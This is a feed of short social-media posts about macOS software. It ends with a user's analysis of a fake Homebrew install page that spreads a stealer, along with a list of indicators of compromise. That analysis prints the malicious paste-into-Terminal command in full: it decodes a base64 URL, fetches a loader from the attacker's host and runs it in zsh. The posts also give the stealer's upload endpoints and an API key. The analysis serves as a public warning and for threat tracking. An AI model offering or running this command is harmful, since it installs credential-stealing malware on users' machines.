@marioguzman I thought I’d ask, do you happen to know how Apple implemented the world map view used in the Date & Time settings (specifically the time zone selector)? It doesn’t seem to be a standard AppKit control and I’m curious whether it’s a private framework, a custom NSView, or something else entirely.

Any insight would be much appreciated!

#AppKit #Cocoa #MacOSX #OSX #macOS #Swift #ObjectiveC

Xpdf to darmowy i otwartoźródłowy program do przeglądania plików PDF oraz zestaw narzędzi oparty na frameworku Qt. Wersje wcześniejsze niż 4.00 zostały napisane dla systemu X Window i Motif. https://biznes.linuxiarze.pl/xpdf/ #pdf #linux #osx #windows #bsd
Xpdf to darmowy i otwartoźródłowy program do przeglądania plików PDF oraz zestaw narzędzi oparty na frameworku Qt. Wersje wcześniejsze niż 4.00 zostały napisane dla systemu X Window i Motif. https://biznes.linuxiarze.pl/xpdf/ #pdf #linux #osx #windows #bsd
Opera GX – a special version of the Opera browser designed for gamers. Opera GX includes standard Opera features such as built-in AdBlock and VPN, as well as features designed for gamers. Opera GX allows you to limit CPU, RAM, and bandwidth usage. https://archiveapp.org/opera-gx/ #webbrowser #linux #osx #windows #ios #android #game
Azahar – an open-source 3DS Nintendo emulator project based on Citra. This project was born as a merge between PabloMK7’s Citra fork and Lime3DS. https://archivegame.org/azahar/ #game #emulator #nintendo #linux #osx #windows #android
Azahar

Web site: azahar-emu.org Category: Machine Emulators Platform: Linux, OS X, Windows, Android License: GNU GPL Interface: GUI Wikipedia: First release: 2013 Azahar – an open-source 3DS emulator project…

ArchiveGame
Emulating old OS X versions with QEMU - 82MHz

I was a bit bored today and so I set up 4 qemu VMs with OS X 10.0 through 10.3.

It's really interesting to see how the OS has changed over time...

#retrocomputing #osx

Spacemacs – a community-driven Emacs distribution. Spacemacs is a new way of experiencing Emacs – it’s a sophisticated and polished set-up, focused on ergonomics, mnemonics and consistency. https://archiveapp.org/spacemacs/ #texteditor #emacs #linux #osx #windows #unix

A more sane and parseable list of indicators:

Landing page

httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7

Loaders

httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
https://datasphere.us.com/debug/payload.applescript?build=492f9e58358e8e2bc9e0414fa077e197

Mocked User Agent for curls

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

APIs

httpX://datasphere.us[.]com/api/debug/event # initial info gathering
httpX://datasphere.us[.]com/gate # stealer upload location
httpX://datasphere.us[.]com/gate/chunk # large file uploads
httpX://datasphere.us[.]com/api/bot/heartbeat # Persistence heartbeat API

api key 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f

#osx #stealer #iocs

Absolute state of google, (and frankly the expectations of developers for installing things).

Setting up an older Mac to use as a new work machine, search google for brew Mac looking for the brew.sh site, first result is a sponsored link to httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.

First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *

echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh


Aww man that base64 makes me feel good and trusting, wonder what's inside

echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat

httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197


hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/

Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1

This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74

Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed

#osx #malware #stealer #google #brew